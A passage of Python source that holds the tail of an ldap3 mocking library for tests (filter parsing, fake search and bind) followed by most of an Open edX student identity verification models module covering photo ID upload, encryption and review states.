                            | pyparsing.Combine(lpar + k + rel + v + rpar)
        expr << atom + pyparsing.ZeroOrMore( expr )

        return expr

    @staticmethod
    def _deDuplicate(results):
        """Return *results* with duplicate DNs removed, preserving order.

        Only the first entry for each DN is kept.
        """
        seen = dict()
        unique = []
        for entry in results:
            dn = entry.get("dn")
            if dn not in seen:
                seen[dn] = 1
                unique.append(entry)

        return unique

    def _invert_results(self, candidates):
        """Return every directory entry that is NOT in *candidates*."""
        remaining = list(self.directory)

        for candidate in candidates:
            try:
                remaining.remove(candidate)
            except ValueError:
                # Candidate is not part of the directory snapshot; ignore.
                pass

        return remaining

    def _search_not(self, base, search_filter, candidates=None):
        """Evaluate a negated ("!") filter branch.

        *search_filter* is mutated: the "!" token and the plain-string
        conditions handled here are removed.  Sub-filter results are
        inverted against ``self.directory``; the string conditions below are
        then evaluated with the *opposite* matcher (e.g. ">=" uses the
        less-than matcher) to implement the negation.
        """
        # Create empty candidates list as we need to use self.directory for
        # each search
        candidates = list()
        this_filter = list()

        index = 0
        search_filter.remove("!")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)
            index +=1

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            # Any remaining element is a nested sub-filter; dispatch on its
            # boolean operator via self.operation.
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates = self.operation.get(sub_filter)(base,
                                                                search_filter,
                                                                candidates)
                else:
                    candidates = self.operation.get(sub_filter[0])(base,
                                                                   sub_filter,
                                                                   candidates)
        except IndexError:
            pass

        candidates = self._invert_results(candidates)

        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                # Negation of ">=" is "<".
                candidates = Connection._match_less_than(base, k, v,
                                                            self.directory)
            elif "<=" in item:
                k, v = item.split("<=")
                # Negation of "<=" is ">".
                candidates = Connection._match_greater_than(base, k, v,
                                                         self.directory)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates = Connection._match_notequal_to(base, k, v,
                                                         self.directory)
            elif "=" in item:
                k, v = item.split("=")
                candidates = Connection._match_notequal_to(base, k, v,
                                                         self.directory)
        return candidates

    def _search_and(self, base, search_filter, candidates=None):
        """Evaluate an "&" (AND) filter branch.

        *search_filter* is mutated: the "&" token and the plain-string
        conditions handled here are removed.  Nested sub-filters are
        evaluated first; each string condition then narrows the surviving
        *candidates*.  The ">=" check must precede the "=" check because
        "=" is a substring of the longer operators.
        """
        # Load the data from the directory, if we aren't passed any
        if candidates == [] or candidates is None:
            candidates = self.directory
        this_filter = list()

        index = 0
        search_filter.remove("&")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)
            index +=1

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            # Any remaining element is a nested sub-filter; dispatch on its
            # boolean operator via self.operation.
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates = self.operation.get(sub_filter)(base,
                                                                search_filter,
                                                                candidates)
                else:
                    candidates = self.operation.get(sub_filter[0])(base,
                                                                   sub_filter,
                                                                   candidates)
        except IndexError:
            pass

        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                candidates = Connection._match_greater_than_or_equal(base, k, v,
                                                                     candidates)
            elif "<=" in item:
                k, v = item.split("<=")
                candidates = Connection._match_less_than_or_equal(base, k, v,
                                                                  candidates)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates = Connection._match_equal_to(base, k, v,
                                                         candidates)
            elif "=" in item:
                k, v = item.split("=")
                candidates = Connection._match_equal_to(base, k, v,
                                                         candidates)
        return candidates

    def _search_or(self, base, search_filter, candidates=None):
        """Evaluate an LDAP OR ("|") filter against the directory.

        Unlike ``_search_and``, any passed-in ``candidates`` are discarded
        and each plain condition is matched against the full
        ``self.directory``; the per-condition results are concatenated
        (duplicates are removed later by ``Connection._deDuplicate``).
        ``search_filter`` is mutated in place.
        """
        # Create empty candidates list as we need to use self.directory for
        # each search
        candidates = list()
        this_filter = list()

        # Collect the plain (non-nested) conditions of this OR clause.
        search_filter.remove("|")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            # Whatever remains is a single nested sub-filter; recurse into
            # it via the operation dispatch table and accumulate matches.
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates += self.operation.get(sub_filter)(base,
                                                                 search_filter,
                                                                 candidates)
                else:
                    candidates += self.operation.get(sub_filter[0])(base,
                                                                    sub_filter,
                                                                    candidates)
        except IndexError:
            # No nested sub-filter present — nothing more to dispatch.
            pass

        # OR semantics: match each plain condition against the whole
        # directory and append the results.
        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                candidates += Connection._match_greater_than_or_equal(base, k, v,
                                                                      self.directory)
            elif "<=" in item:
                k, v = item.split("<=")
                candidates += Connection._match_less_than_or_equal(base, k, v,
                                                                   self.directory)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates += Connection._match_equal_to(base, k, v,
                                                         self.directory)
            elif "=" in item:
                k, v = item.split("=")
                candidates += Connection._match_equal_to(base, k, v,
                                                         self.directory)
        return candidates

    def search(self, search_base=None, search_scope=None,
               search_filter=None, attributes=None, paged_size=5,
               size_limit=0, paged_cookie=None):
        """Mock of ldap3's ``Connection.search``.

        Parses ``search_filter``, dispatches the top-level operation
        ("&", "|", ...) through ``self.operation``, and stores the
        de-duplicated matches on ``self.response``. Always returns True.

        Note: ``search_scope``, ``attributes`` and the paging arguments
        are accepted for API compatibility but ignored by this mock.
        """
        s_filter = list()
        candidates = list()
        self.response = list()
        self.result = dict()

        try:
            if isinstance(search_filter, bytes):
                # We need to convert to unicode otherwise pyparsing will not
                # find the u"ö"
                search_filter = to_unicode(search_filter)
            expr = Connection._parse_filter()
            s_filter = expr.parseString(search_filter).asList()[0]
        except pyparsing.ParseBaseException as exx:
            # Just for debugging purposes
            # NOTE: parse errors are swallowed; an unparsable filter
            # simply yields an empty result set.
            s = "{!s}".format(exx)

        # Dispatch the top-level operation token ("&", "|", ...) of the
        # parsed filter; the handler returns the matching entries.
        for item in s_filter:
            if item[0] in self.operation:
                candidates = self.operation.get(item[0])(search_base,
                                                         s_filter)
        self.response = Connection._deDuplicate(candidates)

        return True

    def unbind(self):
        """Pretend to close the connection; always succeeds in the mock."""
        return True


class Ldap3Mock(object):
    """Test double for the ``ldap3`` library.

    ``start()`` patches ``ldap3.Server`` and ``ldap3.Connection`` so code
    under test talks to a fake directory (persisted to the DIRECTORY
    file) instead of a real LDAP server. Usable as a context manager or
    via the ``activate`` decorator.
    """

    def __init__(self):
        self._calls = CallList()
        self._server_mock = None
        self.directory = []
        self.exception = None
        self.reset()

    def reset(self):
        """Clear the list of recorded calls."""
        self._calls.reset()

    def setLDAPDirectory(self, directory=None):
        """Set the mock directory contents and persist them to disk.

        The on-disk copy is re-read on every bind (see
        ``_on_Connection``) so credential changes made by the code under
        test are picked up. Filesystem errors propagate to the caller.
        """
        if directory is None:
            self.directory = []
        else:
            with open(DIRECTORY, 'w+') as f:
                f.write(str(directory))
                self.directory = directory

    def set_exception(self, exc=True):
        """Make the next mocked Connection construction raise an error."""
        self.exception = exc

    def _load_data(self, directory):
        """Read the directory file back into Python data structures.

        ``literal_eval`` only parses Python literals (no code execution),
        so the fixture file cannot run arbitrary code. Filesystem errors
        propagate to the caller.
        """
        with open(directory, 'r') as f:
            data = f.read()
            return literal_eval(data)

    @property
    def calls(self):
        """The recorded calls (a CallList)."""
        return self._calls

    def __enter__(self):
        self.start()
        # Return self so "with Ldap3Mock() as m:" binds the mock instance.
        return self

    def __exit__(self, *args):
        self.stop()
        self.reset()

    def activate(self, func):
        """Decorator: run *func* with the ldap3 patches active."""
        evaldict = {'ldap3mock': self, 'func': func}
        return get_wrapped(func, _wrapper_template, evaldict)

    def _on_Server(self, host, port, use_ssl, connect_timeout, get_info=None,
                   tls=None):
        # mangle request packet

        return "FakeServerObject"

    def _on_Connection(self, server, user, password,
                       auto_bind=None, client_strategy=None,
                       authentication=None, check_names=None,
                       auto_referrals=None, receive_timeout=None):
        """
        We need to create a Connection object with
        methods:
            add()
            modify()
            search()
            unbind()
        and object
            response
        """
        # Raise an exception, if we are told to do so
        if self.exception:
            raise Exception("LDAP request failed")
        # check the password
        correct_password = False
        # Anonymous bind
        # Reload the directory just in case a change has been made to
        # user credentials
        self.directory = self._load_data(DIRECTORY)
        if authentication == ldap3.ANONYMOUS and user == "":
            correct_password = True
        for entry in self.directory:
            if to_unicode(entry.get("dn")) == user:
                pw = entry.get("attributes").get("userPassword")
                # password can be unicode
                if to_bytes(pw) == to_bytes(password):
                    correct_password = True
                elif pw.startswith('{SSHA}'):
                    # NOTE(review): assumes pw is a text string here; a
                    # bytes value would make startswith('{SSHA}') fail --
                    # confirm against the fixture data.
                    correct_password = ldap_salted_sha1.verify(password, pw)
                else:
                    correct_password = False
        self.con_obj = Connection(self.directory)
        self.con_obj.bound = correct_password
        return self.con_obj

    def start(self):
        """Install the ldap3.Server / ldap3.Connection patches."""
        import mock

        def unbound_on_Server(host, port,
                              use_ssl,
                              connect_timeout, *a, **kwargs):
            return self._on_Server(host, port,
                              use_ssl,
                              connect_timeout, *a, **kwargs)
        self._server_mock = mock.MagicMock()
        self._server_mock.side_effect = unbound_on_Server
        self._patcher = mock.patch('ldap3.Server',
                                   self._server_mock)
        self._patcher.start()

        def unbound_on_Connection(server, user,
                                  password,
                                  auto_bind,
                                  client_strategy,
                                  authentication,
                                  check_names,
                                  auto_referrals, *a, **kwargs):
            return self._on_Connection(server, user,
                                       password,
                                       auto_bind,
                                       client_strategy,
                                       authentication,
                                       check_names,
                                       auto_referrals, *a,
                                       **kwargs)

        self._patcher2 = mock.patch('ldap3.Connection',
                                    unbound_on_Connection)
        self._patcher2.start()

    def stop(self):
        """Remove the patches installed by start()."""
        self._patcher.stop()
        self._patcher2.stop()
        self._server_mock = None

    def get_server_mock(self):
        """Return the MagicMock standing in for ldap3.Server."""
        return self._server_mock

# expose default mock namespace
mock = _default_mock = Ldap3Mock()
# Re-export every public attribute of the default mock at module level.
__all__ = [name for name in dir(_default_mock) if not name.startswith('_')]
for __attr in __all__:
    globals()[__attr] = getattr(_default_mock, __attr)

# -*- coding: utf-8 -*-
"""
Models for Student Identity Verification

This is where we put any models relating to establishing the real-life identity
of a student over a period of time. Right now, the only models are the abstract
`PhotoVerification`, and its one concrete implementation
`SoftwareSecurePhotoVerification`. The hope is to keep as much of the
photo verification process as generic as possible.
"""
import functools
import json
import logging
import os.path
import uuid
from datetime import timedelta
from email.utils import formatdate

import requests
import six
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.files.base import ContentFile
from django.urls import reverse
from django.db import models
from django.dispatch import receiver
from django.utils.functional import cached_property
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy
from model_utils import Choices
from model_utils.models import StatusModel, TimeStampedModel
from opaque_keys.edx.django.models import CourseKeyField

from lms.djangoapps.verify_student.ssencrypt import (
    encrypt_and_encode,
    generate_signed_message,
    random_aes_key,
    rsa_encrypt
)
from openedx.core.djangoapps.signals.signals import LEARNER_NOW_VERIFIED
from openedx.core.storage import get_storage

from .utils import earliest_allowed_verification_date

log = logging.getLogger(__name__)


def generateUUID():  # pylint: disable=invalid-name
    """Return a freshly generated random (version 4) UUID as a string."""
    return "{}".format(uuid.uuid4())


class VerificationException(Exception):
    """Raised when a status-guarded method is called while the attempt is
    in a status not allowed by its ``@status_before_must_be`` decorator."""
    pass


def status_before_must_be(*valid_start_statuses):
    """
    Decorator factory that enforces a status precondition on a method.

    The wrapped method may only run while the object's `status` attribute
    is one of ``valid_start_statuses``; otherwise a `VerificationException`
    is raised. Typical use on a workflow model:

        @status_before_must_be("submitted", "approved", "denied")
        def refund_user(self, user_id):
            # Do logic here...

    This keeps the status-guard boilerplate out of the method bodies.
    """
    def decorator_func(func):
        """
        The actual decorator applied to the target method.
        """
        @functools.wraps(func)
        def with_status_check(obj, *args, **kwargs):
            # Guard clause: only run the method from an allowed status.
            if obj.status in valid_start_statuses:
                return func(obj, *args, **kwargs)
            exception_msg = (
                u"Error calling {} {}: status is '{}', must be one of: {}"
            ).format(func, obj, obj.status, valid_start_statuses)
            raise VerificationException(exception_msg)

        return with_status_check

    return decorator_func


class IDVerificationAttempt(StatusModel):
    """
    Each IDVerificationAttempt represents a Student's attempt to establish
    their identity through one of several methods that inherit from this Model,
    including PhotoVerification and SSOVerification.

    .. pii: The User's name is stored in this and sub-models
    .. pii_types: name
    .. pii_retirement: retained
    """
    # Workflow states; StatusModel derives the `status` field from these.
    STATUS = Choices('created', 'ready', 'submitted', 'must_retry', 'approved', 'denied')
    user = models.ForeignKey(User, db_index=True, on_delete=models.CASCADE)

    # They can change their name later on, so we want to copy the value here so
    # we always preserve what it was at the time they requested. We only copy
    # this value during the mark_ready() step. Prior to that, you should be
    # displaying the user's name from their user.profile.name.
    name = models.CharField(blank=True, max_length=255)

    created_at = models.DateTimeField(auto_now_add=True, db_index=True)
    updated_at = models.DateTimeField(auto_now=True, db_index=True)

    class Meta(object):
        app_label = "verify_student"
        abstract = True
        ordering = ['-created_at']

    @property
    def expiration_datetime(self):
        """Datetime that the verification will expire.

        Computed as `created_at` plus the ``VERIFY_STUDENT["DAYS_GOOD_FOR"]``
        setting.
        """
        days_good_for = settings.VERIFY_STUDENT["DAYS_GOOD_FOR"]
        return self.created_at + timedelta(days=days_good_for)

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        raise NotImplementedError

    def active_at_datetime(self, deadline):
        """Check whether the verification was active at a particular datetime.

        Arguments:
            deadline (datetime): The date at which the verification was active
                (created before and expiration datetime is after today).

        Returns:
            bool

        """
        # NOTE(review): expiration is compared against now(), not against
        # `deadline`; per the docstring ("after today") this appears
        # intentional -- confirm before changing.
        return (
            self.created_at < deadline and
            self.expiration_datetime > now()
        )


class ManualVerification(IDVerificationAttempt):
    """
    Each ManualVerification represents a user's verification that bypasses the need for
    any other verification.

    .. pii: The User's name is stored in the parent model
    .. pii_types: name
    .. pii_retirement: retained
    """

    # Free-text audit note recording why the verification was granted.
    reason = models.CharField(
        max_length=255,
        blank=True,
        help_text=(
            'Specifies the reason for manual verification of the user.'
        )
    )

    class Meta(object):
        app_label = 'verify_student'

    def __unicode__(self):
        """Python 2 unicode representation of this verification."""
        return 'ManualIDVerification for {name}, status: {status}'.format(
            name=self.name,
            status=self.status,
        )

    def should_display_status_to_user(self):
        """
        Whether or not the status should be displayed to the user.
        """
        return False


class SSOVerification(IDVerificationAttempt):
    """
    Each SSOVerification represents a Student's attempt to establish their identity
    by signing in with SSO. ID verification through SSO bypasses the need for
    photo verification.

    .. no_pii:
    """

    # Dotted paths to the third_party_auth provider-config models; stored
    # as the value of identity_provider_type.
    OAUTH2 = 'third_party_auth.models.OAuth2ProviderConfig'
    SAML = 'third_party_auth.models.SAMLProviderConfig'
    LTI = 'third_party_auth.models.LTIProviderConfig'
    IDENTITY_PROVIDER_TYPE_CHOICES = (
        (OAUTH2, 'OAuth2 Provider'),
        (SAML, 'SAML Provider'),
        (LTI, 'LTI Provider'),
    )

    identity_provider_type = models.CharField(
        max_length=100,
        blank=False,
        choices=IDENTITY_PROVIDER_TYPE_CHOICES,
        default=SAML,
        help_text=(
            'Specifies which type of Identity Provider this verification originated from.'
        )
    )

    identity_provider_slug = models.SlugField(
        max_length=30, db_index=True, default='default',
        help_text=(
            'The slug uniquely identifying the Identity Provider this verification originated from.'
        ))

    class Meta(object):
        app_label = "verify_student"

    def __unicode__(self):
        """Python 2 unicode representation of this verification."""
        return 'SSOIDVerification for {name}, status: {status}'.format(
            name=self.name,
            status=self.status,
        )

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        return False


class PhotoVerification(IDVerificationAttempt):
    """
    Each PhotoVerification represents a Student's attempt to establish
    their identity by uploading a photo of themselves and a picture ID. An
    attempt actually has a number of fields that need to be filled out at
    different steps of the approval process. While it's useful as a Django Model
    for the querying facilities, **you should only edit a `PhotoVerification`
    object through the methods provided**. Initialize them with a user:

    attempt = PhotoVerification(user=user)

    We track this attempt through various states:

    `created`
        Initial creation and state we're in after uploading the images.
    `ready`
        The user has uploaded their images and checked that they can read the
        images. There's a separate state here because it may be the case that we
        don't actually submit this attempt for review until payment is made.
    `submitted`
        Submitted for review. The review may be done by a staff member or an
        external service. The user cannot make changes once in this state.
    `must_retry`
        We submitted this, but there was an error on submission (i.e. we did not
        get a 200 when we POSTed to Software Secure)
    `approved`
        An admin or an external service has confirmed that the user's photo and
        photo ID match up, and that the photo ID's name matches the user's.
    `denied`
        The request has been denied. See `error_msg` for details on why. An
        admin might later override this and change to `approved`, but the
        student cannot re-open this attempt -- they have to create another
        attempt and submit it instead.

    Because this Model inherits from IDVerificationAttempt, which inherits
    from StatusModel, we can also do things like:

        attempt.status == PhotoVerification.STATUS.created
        attempt.status == "created"
        pending_requests = PhotoVerification.submitted.all()

    .. pii: The User's name is stored in the parent model, this one stores links to face and photo ID images
    .. pii_types: name, image
    .. pii_retirement: retained
    """
    ######################## Fields Set During Creation ########################
    # See class docstring for description of status states
    # Where we place the uploaded image files (e.g. S3 URLs)
    face_image_url = models.URLField(blank=True, max_length=255)
    photo_id_image_url = models.URLField(blank=True, max_length=255)

    # Randomly generated UUID so that external services can post back the
    # results of checking a user's photo submission without use exposing actual
    # user IDs or something too easily guessable.
    receipt_id = models.CharField(
        db_index=True,
        default=generateUUID,
        max_length=255,
    )

    # Indicates whether or not a user wants to see the verification status
    # displayed on their dash.  Right now, only relevant for allowing students
    # to "dismiss" a failed midcourse reverification message
    # TODO: This field is deprecated.
    display = models.BooleanField(db_index=True, default=True)

    ######################## Fields Set When Submitting ########################
    submitted_at = models.DateTimeField(null=True, db_index=True)

    #################### Fields Set During Approval/Denial #####################
    # If the review was done by an internal staff member, mark who it was.
    reviewing_user = models.ForeignKey(
        User,
        db_index=True,
        default=None,
        null=True,
        related_name="photo_verifications_reviewed",
        on_delete=models.CASCADE,
    )

    # Mark the name of the service used to evaluate this attempt (e.g
    # Software Secure).
    reviewing_service = models.CharField(blank=True, max_length=255)

    # If status is "denied", this should contain text explaining why.
    error_msg = models.TextField(blank=True)

    # Non-required field. External services can add any arbitrary codes as time
    # goes on. We don't try to define an exhaustive list -- this is just
    # capturing it so that we can later query for the common problems.
    error_code = models.CharField(blank=True, max_length=50)

    class Meta(object):
        app_label = "verify_student"
        abstract = True
        ordering = ['-created_at']

    def parsed_error_msg(self):
        """
        Sometimes, the error message we've received needs to be parsed into
        something more human readable

        The default behavior is to return the current error message as is.
        """
        return self.error_msg

    @status_before_must_be("created")
    def upload_face_image(self, img):
        """Store the user's face image; must be implemented by subclasses."""
        raise NotImplementedError

    @status_before_must_be("created")
    def upload_photo_id_image(self, img):
        """Store the user's photo ID image; must be implemented by subclasses."""
        raise NotImplementedError

    @status_before_must_be("created")
    def mark_ready(self):
        """
        Mark that the user data in this attempt is correct. In order to
        succeed, the user must have uploaded the necessary images
        (`face_image_url`, `photo_id_image_url`). This method will also copy
        their name from their user profile. Prior to marking it ready, we read
        this value directly from their profile, since they're free to change it.
        This often happens because people put in less formal versions of their
        name on signup, but realize they want something different to go on a
        formal document.

        Valid attempt statuses when calling this method:
            `created`

        Status after method completes: `ready`

        Other fields that will be set by this method:
            `name`

        State Transitions:

        `created` → `ready`
            This is what happens when the user confirms to us that the pictures
            they uploaded are good. Note that we don't actually do a submission
            anywhere yet.
        """
        # At any point prior to this, they can change their names via their
        # student dashboard. But at this point, we lock the value into the
        # attempt.
        self.name = self.user.profile.name
        self.status = "ready"
        self.save()

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def approve(self, user_id=None, service=""):
        """
        Approve this attempt, recording `user_id` as the reviewing user.

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        Status after method completes: `approved`

        Other fields that will be set by this method:
            `reviewed_by_user_id`, `reviewed_by_service`, `error_msg`

        State Transitions:

        `submitted` → `approved`
            This is the usual flow, whether initiated by a staff user or an
            external validation service.
        `approved` → `approved`
            No-op. First one to approve it wins.
        `denied` → `approved`
            This might happen if a staff member wants to override a decision
            made by an external service or another staff member (say, in
            response to a support request). In this case, the previous values
            of `reviewed_by_user_id` and `reviewed_by_service` will be changed
            to whoever is doing the approving, and `error_msg` will be reset.
            The only record that this record was ever denied would be in our
            logs. This should be a relatively rare occurrence.
        """
        # If someone approves an outdated version of this, the first one wins
        if self.status == "approved":
            return

        log.info(u"Verification for user '{user_id}' approved by '{reviewer}'.".format(
            user_id=self.user, reviewer=user_id
        ))
        self.error_msg = ""  # reset, in case this attempt was denied before
        self.error_code = ""  # reset, in case this attempt was denied before
        self.reviewing_user = user_id
        self.reviewing_service = service
        self.status = "approved"
        self.save()
        # Emit signal to find and generate eligible certificates
        LEARNER_NOW_VERIFIED.send_robust(
            sender=PhotoVerification,
            user=self.user
        )

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def deny(self,
             error_msg,
             error_code="",
             reviewing_user=None,
             reviewing_service=""):
        """
        Deny this attempt.

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        Status after method completes: `denied`

        Other fields that will be set by this method:
            `reviewed_by_user_id`, `reviewed_by_service`, `error_msg`,
            `error_code`

        State Transitions:

        `submitted` → `denied`
            This is the usual flow, whether initiated by a staff user or an
            external validation service.
        `approved` → `denied`
            This might happen if a staff member wants to override a decision
            made by an external service or another staff member, or just correct
            a mistake made during the approval process. In this case, the
            previous values of `reviewed_by_user_id` and `reviewed_by_service`
            will be changed to whoever is doing the denying. The only record
            that this record was ever approved would be in our logs. This should
            be a relatively rare occurrence.
        `denied` → `denied`
            Update the error message and reviewing_user/reviewing_service. Just
            lets you amend the error message in case there were additional
            details to be made.
        """
        log.info(u"Verification for user '{user_id}' denied by '{reviewer}'.".format(
            user_id=self.user, reviewer=reviewing_user
        ))
        self.error_msg = error_msg
        self.error_code = error_code
        self.reviewing_user = reviewing_user
        self.reviewing_service = reviewing_service
        self.status = "denied"
        self.save()

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def system_error(self,
                     error_msg,
                     error_code="",
                     reviewing_user=None,
                     reviewing_service=""):
        """
        Mark that this attempt could not be completed because of a system error.
        Status should be moved to `must_retry`. For example, if Software Secure
        reported to us that they couldn't process our submission because they
        couldn't decrypt the image we sent.
        """
        if self.status in ["approved", "denied"]:
            return  # If we were already approved or denied, just leave it.

        self.error_msg = error_msg
        self.error_code = error_code
        self.reviewing_user = reviewing_user
        self.reviewing_service = reviewing_service
        self.status = "must_retry"
        self.save()

    @classmethod
    def retire_user(cls, user_id):
        """
        Retire user as part of GDPR Phase I
        Returns 'True' if records found

        :param user_id: int
        :return: bool
        """
        try:
            user_obj = User.objects.get(id=user_id)
        except User.DoesNotExist:
            return False

        # Blank out all PII-bearing fields on the user's attempts.
        # NOTE(review): `photo_id_key` is declared on
        # SoftwareSecurePhotoVerification, not on this abstract class --
        # confirm retire_user is only ever invoked via that subclass.
        photo_objects = cls.objects.filter(
            user=user_obj
        ).update(
            name='',
            face_image_url='',
            photo_id_image_url='',
            photo_id_key=''
        )
        return photo_objects > 0


class SoftwareSecurePhotoVerification(PhotoVerification):
    """
    Model to verify identity using a service provided by Software Secure. Much
    of the logic is inherited from `PhotoVerification`, but this class
    encrypts the photos.

    Software Secure (http://www.softwaresecure.com/) is a remote proctoring
    service that also does identity verification. A student uses their webcam
    to upload two images: one of their face, one of a photo ID. Due to the
    sensitive nature of the data, the following security precautions are taken:

    1. The snapshot of their face is encrypted using AES-256 in CBC mode. All
       face photos are encrypted with the same key, and this key is known to
       both Software Secure and edx-platform.

    2. The snapshot of a user's photo ID is also encrypted using AES-256, but
       the key is randomly generated using os.urandom. Every verification
       attempt has a new key. The AES key is then encrypted using a public key
       provided by Software Secure. We store only the RSA-encrypted AES key.
       Since edx-platform does not have Software Secure's private RSA key, it
       means that we can no longer even read photo ID.

    3. The encrypted photos are base64 encoded and stored in an S3 bucket that
       edx-platform does not have read access to.

    Note: this model handles *initial* verifications (which you must perform
    at the time you register for a verified cert).

    .. pii: The User's name is stored in the parent model, this one stores links to face and photo ID images
    .. pii_types: name, image
    .. pii_retirement: retained
    """
    # This is a base64.urlsafe_encode(rsa_encrypt(photo_id_aes_key), ss_pub_key)
    # So first we generate a random AES-256 key to encrypt our photo ID with.
    # Then we RSA encrypt it with Software Secure's public key. Then we base64
    # encode that. The result is saved here. Actual expected length is 344.
    photo_id_key = models.TextField(max_length=1024)

    # How long a generated S3 link to a photo remains valid.
    IMAGE_LINK_DURATION = 5 * 60 * 60 * 24  # 5 days in seconds

    # For reverification: points at the earlier attempt whose photo ID data
    # should be re-sent alongside a fresh face photo (see `submit`).
    copy_id_photo_from = models.ForeignKey("self", null=True, blank=True, on_delete=models.CASCADE)

    # Fields for functionality of sending email when verification expires
    # expiry_date: The date when the SoftwareSecurePhotoVerification will expire
    # expiry_email_date: This field is used to maintain a check for learners to which email
    # to notify for expired verification is already sent.
    expiry_date = models.DateTimeField(null=True, blank=True, db_index=True)
    expiry_email_date = models.DateTimeField(null=True, blank=True, db_index=True)

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def approve(self, user_id=None, service=""):
        """
        Approve the verification attempt for user.

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        After method completes:
            status is set to `approved`
            expiry_date is set to VERIFY_STUDENT["DAYS_GOOD_FOR"] days from now
        """
        # Compute the expiry first so a failure here leaves status untouched.
        self.expiry_date = now() + timedelta(
            days=settings.VERIFY_STUDENT["DAYS_GOOD_FOR"]
        )
        super(SoftwareSecurePhotoVerification, self).approve(user_id, service)

    @classmethod
    def get_initial_verification(cls, user, earliest_allowed_date=None):
        """Get initial verification for a user with the 'photo_id_key'.

        Arguments:
            user(User): user object
            earliest_allowed_date(datetime): override expiration date for initial verification

        Return:
            SoftwareSecurePhotoVerification (object) or None
        """
        # Attempts with an empty photo_id_key never had ID photo data
        # uploaded, so they can't serve as a source for reverification.
        init_verification = cls.objects.filter(
            user=user,
            status__in=["submitted", "approved"],
            created_at__gte=(
                earliest_allowed_date or earliest_allowed_verification_date()
            )
        ).exclude(photo_id_key='')

        return init_verification.latest('created_at') if init_verification.exists() else None

    @status_before_must_be("created")
    def upload_face_image(self, img_data):
        """
        Upload an image of the user's face. `img_data` should be a raw
        bytestream of a PNG image. This method will take the data, encrypt it
        using our FACE_IMAGE_AES_KEY, encode it with base64 and save it to the
        storage backend.

        Yes, encoding it to base64 adds compute and disk usage without much real
        benefit, but that's what the other end of this API is expecting to get.
        """
        # Skip this whole thing if we're running acceptance tests or if we're
        # developing and aren't interested in working on student identity
        # verification functionality. If you do want to work on it, you have to
        # explicitly enable these in your private settings.
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            return

        # The configured key is hex; convert to raw bytes for the cipher.
        # NOTE(review): str.decode("hex") is Python 2 only — binascii.unhexlify
        # is the 2/3-compatible equivalent if this is ever ported.
        aes_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["FACE_IMAGE_AES_KEY"]
        aes_key = aes_key_str.decode("hex")

        path = self._get_path("face")
        buff = ContentFile(encrypt_and_encode(img_data, aes_key))
        self._storage.save(path, buff)

    @status_before_must_be("created")
    def upload_photo_id_image(self, img_data):
        """
        Upload the user's photo ID image. `img_data` should be a raw
        bytestream of a PNG image. This method will take the data, encrypt it
        using a randomly generated AES key, encode it with base64 and save it
        to the storage backend. The random key is also encrypted using Software
        Secure's public RSA key and stored in our `photo_id_key` field.

        Yes, encoding it to base64 adds compute and disk usage without much real
        benefit, but that's what the other end of this API is expecting to get.
        """
        # Skip this whole thing if we're running acceptance tests or if we're
        # developing and aren't interested in working on student identity
        # verification functionality. If you do want to work on it, you have to
        # explicitly enable these in your private settings.
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            # fake photo id key is set only for initial verification
            self.photo_id_key = 'fake-photo-id-key'
            self.save()
            return

        # Fresh AES key per attempt; only the RSA-encrypted form is kept.
        aes_key = random_aes_key()
        rsa_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["RSA_PUBLIC_KEY"]
        rsa_encrypted_aes_key = rsa_encrypt(aes_key, rsa_key_str)

        # Save this to the storage backend
        path = self._get_path("photo_id")
        buff = ContentFile(encrypt_and_encode(img_data, aes_key))
        self._storage.save(path, buff)

        # Update our record fields
        # NOTE(review): .encode('base64') is Python 2 only — base64.b64encode
        # is the 2/3-compatible equivalent if this is ever ported.
        self.photo_id_key = rsa_encrypted_aes_key.encode('base64')
        self.save()

    @status_before_must_be("must_retry", "ready", "submitted")
    def submit(self, copy_id_photo_from=None):
        """
        Submit our verification attempt to Software Secure for validation. This
        will set our status to "submitted" if the post is successful, and
        "must_retry" if the post fails.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        """
        try:
            response = self.send_request(copy_id_photo_from=copy_id_photo_from)
            if response.ok:
                self.submitted_at = now()
                self.status = "submitted"
                self.save()
            else:
                # Keep Software Secure's response body for later diagnosis
                # (see parsed_error_msg).
                self.status = "must_retry"
                self.error_msg = response.text
                self.save()
